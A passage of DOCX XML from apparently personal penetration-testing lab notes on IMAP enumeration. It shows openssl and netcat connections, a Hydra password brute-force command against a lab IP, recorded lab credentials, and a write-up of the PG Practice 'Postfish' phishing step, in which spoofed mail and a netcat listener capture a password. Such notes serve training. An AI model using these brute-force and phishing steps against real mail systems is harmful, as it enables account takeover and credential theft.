      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For IMAPS (IMAP over SSL on port 993):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect target:993</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this instead of netcat to connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, try STARTTLS authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.229.137 113</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STARTTLS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in this command initially</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect 192.168.229.137:143 -starttls imap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can authenticate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For anonymous login:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="600"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 LOGIN anonymous ""</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE ABOUT TAGS (a1, a2, …):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1, a2, etc. are just tags you invent to match commands with responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They don’t have to be sequential or numeric — order doesn’t matter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only rule: tags must be unique in that session to avoid ambiguity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can do like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1, b2111, michael, f32</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and so on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You just can't have two duplicate tags </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="894"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">People just use a1, a2 and so on for easy organization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce IMAP using Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1273"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l jonas -P rockyou.txt -e nsr imap://192.168.244.140</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027FF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic commands to run everywhere:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002800">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 login jonas SicMundusCreatusEst</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002801">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a2 select INBOX → choose a mailbox/folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002802">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a3 list "" * → list all mailboxes/folders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002803">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002804">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands to run while inside a mailbox/folder or subfolder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002805">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a4 fetch 1 body[] → fetch message 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002806">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a5 fetch 2 body[header] → fetch headers only</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002807">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a6 search all → list all message ID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002808">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="711"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a7 close → leave your folder or subfolder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002809">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7719572" cy="4008239"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="531" name="image513.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image513.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId838"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7719572" cy="4008239"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280A">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="8269580" cy="2709863"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="385" name="image373.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image373.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId839"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="826958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280B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="930"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here the creds were </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sales:sales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="930"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you can see we only have 1 message in INBOX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="930"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Form this, they saw </w:t>
      </w:r>
      <w:hyperlink r:id="rId840">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the one sending the email, and SMTP required no authentication, so they could send an email as </w:t>
      </w:r>
      <w:hyperlink r:id="rId841">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And so they did and inside the email they used key words like "Password”, “Reset” and “Link” and put the URL of our own computer in the email to "change the password." This is because the email we got legit says that IT team will be sending links to reset password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="930"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then set up a listener on our IP for port 80 and when they clicked on the link, we got a POST request sent to our netcat listener which includes the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000280F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="930"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId842">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002810">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
